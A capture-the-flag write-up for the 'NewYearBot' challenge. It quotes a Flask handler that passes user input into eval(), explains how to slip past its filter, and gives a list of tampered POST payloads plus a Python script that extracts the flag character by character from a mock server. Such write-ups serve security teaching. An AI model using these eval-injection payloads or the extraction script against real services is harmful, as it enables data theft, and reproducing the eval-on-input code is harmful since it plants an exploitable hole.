NewYearBot

100

Description

New Year New Code! My friend decided to learn to code in the new year; here is his very first website: http://172.105.120.180:9999/

File

He said it is very secure because he is very strict about what users can input. Can you check?

https://drive.google.com/file/d/1tU18ePUAHHYpxJ9QhdVKBpuBm_eXy--r/view?usp=sharing

Note

Don't generate excessive load. Scanning/Dirbust is not needed.

Author

@tsug0d

A web application written with Flask. The flag is read from an environment variable at start-up and kept in a module-level name:
```python
from flask import Flask, request
import re, random, os

app = Flask(__name__)
FL4G = os.environ.get('secret_flag')   # module-level name, so eval() in the handler can reach it
```
The handler passes both POST fields straight into eval(): `type` only has to pass isidentifier() and `number` only has to pass botValidator(). So with type=FL4G and an index as number we should be able to read the flag one character at a time. The relevant part of the handler (the route, the greeting lists and the surrounding definitions are not reproduced in this writeup):
```python
        debug = request.args.get("debug")            # ?debug=... on the query string
        if request.method == 'POST':
            greetType = request.form["type"]          # user-controlled
            greetNumber = request.form["number"]      # user-controlled
            if greetType == "greeting_all":
                greeting = random_greet(random.choice(NewYearCategoryList))
            else:
                try:
                    if greetType != None and greetNumber != None:
                        greetNumber = re.sub(r'\s+', '', greetNumber)   # whitespace is stripped, not rejected
                        if greetType.isidentifier() == True and botValidator(greetNumber) == True:
                            if len("%s[%s]" % (greetType, greetNumber)) > 20:   # "FL4G[" + number + "]" leaves 14 chars
                                greeting = fail
                            else:
                                greeting = eval("%s[%s]" % (greetType, greetNumber))   # e.g. FL4G[0]
                            try:
                                if greeting != fail and debug != None:
                                    # debug mode appends len(FL4G), i.e. it also leaks the flag length
                                    greeting += "<br>You're choosing %s, it has %s quotes"%(greetType, len(eval(greetType)))
                    # ... (rest of the handler not shown)
```
The input check effectively limits the digits to 0-5: botValidator() concatenates every digit run in the input and rejects it when, read as a number, it exceeds the last index of the longest greeting list (so "2*3" is rejected as 23, and a nonzero digit can only ever be the last digit of the expression). The operator characters are not filtered, though: only characters with codes 58 to 122 (letters, but also ^, _ and [ ]) are refused, so ( ) + - * ~ and | get through, and the rest of the index can be built from those.
```python
def botValidator(s):
    # Number only!  (really: reject ':'..'z', i.e. letters and also '[', ']', '^', '_', '`')
    for c in s:
        if (57 < ord(c) < 123):
            return False
    # The number should only within length of greeting list.
    # All digit runs are concatenated first: "0**0*3" -> "003" -> 3, but "2*3" -> "23"
    n = "".join(x for x in re.findall(r'\d+', s))
    if n.isnumeric():
        ev = "max("
        for gl in NewYearCategoryList:
            ev += "len(%s)," % gl
        l = eval(ev[:-1]+")")          # length of the longest greeting list (6, judging by the 0-5 limit)
        if int(n) > (l-1):
            return False
    return True
```
Using Fiddler, tamper with the POST data as below; each request returns one character of the flag. Indices 0-5 are plain digits. Larger indices are built from 0 with ~ (bitwise not, ~x == -x-1), unary -, ** and *, keeping the single nonzero digit last and the whole index within the 14 characters the length check allows. From index 13 onward, negative indices (counting back from the end of the string) are shorter, so the second half is read from the end.
```text
type=FL4G&number=0                 # index 0  -> T
type=FL4G&number=1                 # index 1  -> e
type=FL4G&number=2                 # index 2  -> t
type=FL4G&number=3                 # index 3  -> C
type=FL4G&number=4                 # index 4  -> T
type=FL4G&number=5                 # index 5  -> F
type=FL4G&number=-~0**0*3          # index 6  -> {     (-~0**0 == 2, times 3)
type=FL4G&number=~(~0**0*4)        # index 7  -> J     (~(-8))
type=FL4G&number=-~0**0*4          # index 8  -> u
type=FL4G&number=~(~0**0*5)        # index 9  -> S     (~(-10))
type=FL4G&number=-~0**0*5          # index 10 -> t
type=FL4G&number=0**0-~0**0*5      # index 11 -> _     (1 - (-10))
type=FL4G&number=~0**0*~0**0*3     # index 12 -> F     ((-2)*(-2)*3)
type=FL4G&number=-(-~0-~0**0*5)    # index -11 = 13 -> 0
type=FL4G&number=~0**0*5           # index -10 = 14 -> r
type=FL4G&number=-~(~0**0*5)       # index -9  = 15 -> F
type=FL4G&number=~0**0*4           # index -8  = 16 -> u
type=FL4G&number=-~(~0**0*4)       # index -7  = 17 -> n
type=FL4G&number=~0**0*3           # index -6  = 18 -> n
type=FL4G&number=-5                # index -5  = 19 -> (
type=FL4G&number=-4                # index -4  = 20 -> ^
type=FL4G&number=-3                # index -3  = 21 -> _
type=FL4G&number=-2                # index -2  = 22 -> ^
type=FL4G&number=-1                # index -1  = 23 -> }
```
The flag is:
TetCTF{JuSt_F0rFunn(^_^}
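The payload list above was worked out by hand. What follows is an added example (my code, not the writeup's or the challenge's): it re-implements botValidator() and the 20-character cap offline, searches for the shortest accepted expression for every index, and reads the flag back through a mock of the handler, learning the flag length from the debug suffix that the quoted source appends. Assumptions not stated on the page: the longest greeting list has 6 entries (which is what the observed 0-5 limit implies), the `fail` value is the string "fail", and an out-of-range index also produces it. The flag served by the mock is the one from this writeup.

```python
import re

# Assumptions (not on the page): longest greeting list has 6 entries, the fail
# response is the string "fail", and an out-of-range index also yields it.
MAX_LIST_LEN = 6                    # assumption: max(len(l) for l in NewYearCategoryList)
LEN_LIMIT = 20                      # from: len("%s[%s]" % (greetType, greetNumber)) > 20
FAIL = "fail"                       # assumption: the handler's `fail` response
GREET_TYPE = "FL4G"
SAMPLE_FLAG = "TetCTF{JuSt_F0rFunn(^_^}"   # the flag from this writeup, served by the mock


def bot_validator(s):
    """Re-implementation of botValidator(): reject any char in ':'..'z', then
    concatenate every digit run and reject it if it exceeds the last index."""
    for c in s:
        if 57 < ord(c) < 123:       # letters, and also '[', ']', '^', '_', '`'
            return False
    n = "".join(re.findall(r"\d+", s))
    if n.isnumeric() and int(n) > MAX_LIST_LEN - 1:
        return False
    return True


def server_accepts(number):
    """Both gates between the POST body and eval(): validator and 20-char cap."""
    number = re.sub(r"\s+", "", number)
    return bot_validator(number) and len("%s[%s]" % (GREET_TYPE, number)) <= LEN_LIMIT


def value_of(expr):
    """Evaluate an index expression with no names or builtins available."""
    return eval(expr, {"__builtins__": {}}, {})


def build_table(limit=32, rounds=12):
    """Shortest accepted expression for each integer in [-limit, limit] reachable
    from the digits 0-5 with ~, unary -, *, + and binary -.  Since the validator
    concatenates all digit runs, a nonzero digit is only legal as the LAST digit,
    so zero-only sub-expressions are tracked separately: only they may stand on
    the left of a binary operator.  The kind (atom/term/sum) records the top-level
    operator so parentheses are added where Python's precedence needs them."""
    max_expr = LEN_LIMIT - len("%s[]" % GREET_TYPE)        # 14 characters for the index
    best = {(int(d), d != "0"): (d, "atom") for d in "012345"}

    def consider(value, expr, kind, new):
        if abs(value) > limit or len(expr) > max_expr or not server_accepts(expr):
            return
        key = (value, any(c in "12345" for c in expr))
        for table in (best, new):
            cur = table.get(key)
            if cur is not None and len(cur[0]) <= len(expr):
                return
        new[key] = (expr, kind)

    def as_atom(expr, kind):
        return expr if kind == "atom" else "(%s)" % expr

    for _round in range(rounds):
        new, items = {}, list(best.items())
        for (v, _), (e, k) in items:
            consider(~v, "~" + as_atom(e, k), "atom", new)    # ~x == -x-1
            consider(-v, "-" + as_atom(e, k), "atom", new)
        for (v1, nonzero1), (e1, k1) in items:
            if nonzero1:                                      # its digit would no longer be last
                continue
            left = e1 if k1 != "sum" else "(%s)" % e1
            for (v2, _), (e2, k2) in items:
                right = e2 if k2 != "sum" else "(%s)" % e2
                consider(v1 * v2, left + "*" + as_atom(e2, k2), "term", new)
                consider(v1 + v2, e1 + "+" + right, "sum", new)
                consider(v1 - v2, e1 + "-" + right, "sum", new)
        if not new:
            break
        best.update(new)

    table = {}
    for (v, _), (e, _) in best.items():
        if v not in table or len(e) < len(table[v]):
            table[v] = e
    return table


def make_mock_server(flag):
    """Stand-in for the POST handler, following the quoted source line by line.
    The returned send(form, args) gives back the response body."""
    names = {GREET_TYPE: flag}

    def send(form, args):
        greet_type, number, debug = form["type"], form["number"], args.get("debug")
        number = re.sub(r"\s+", "", number)
        if not (greet_type.isidentifier() and bot_validator(number)):
            return FAIL
        if len("%s[%s]" % (greet_type, number)) > LEN_LIMIT:
            return FAIL
        try:
            greeting = eval("%s[%s]" % (greet_type, number), {"__builtins__": {}}, names)
        except Exception:                 # assumption: IndexError ends up as the fail page
            return FAIL
        if debug is not None:             # the debug branch also leaks len(FL4G)
            greeting += "<br>You're choosing %s, it has %s quotes" % (
                greet_type, len(eval(greet_type, {"__builtins__": {}}, names)))
        return greeting

    return send


def recover_flag(send, table):
    """Learn the length from the debug suffix, then fetch every position through
    a positive index when the table has one and the negative index otherwise."""
    probe = send({"type": GREET_TYPE, "number": "0"}, {"debug": "1"})
    length = int(re.search(r"it has (\d+) quotes", probe).group(1))
    chars = []
    for pos in range(length):
        idx = pos if pos in table else pos - length
        if idx not in table:
            raise ValueError("no accepted expression reaches position %d" % pos)
        resp = send({"type": GREET_TYPE, "number": table[idx]}, {})
        if resp == FAIL:
            raise RuntimeError("server rejected %r" % table[idx])
        chars.append(resp)
    return "".join(chars)


if __name__ == "__main__":
    table = build_table()
    for i in (6, 13, 18, 21, -2):
        print("%3d  %s" % (i, table.get(i)))
    print(recover_flag(make_mock_server(SAMPLE_FLAG), table))
```

Run as a script it prints a few generated indices and the recovered flag. The search only needs ( ) + - * ~ and the digits: the `**` used in the payloads above is never required, and every index from -7 to 21 fits in the 14 available characters, so a 24-character flag needs no negative index beyond -2. Against the live service, send() would be a requests.post() to the URL in the description, with debug passed as a query parameter as the source reads it.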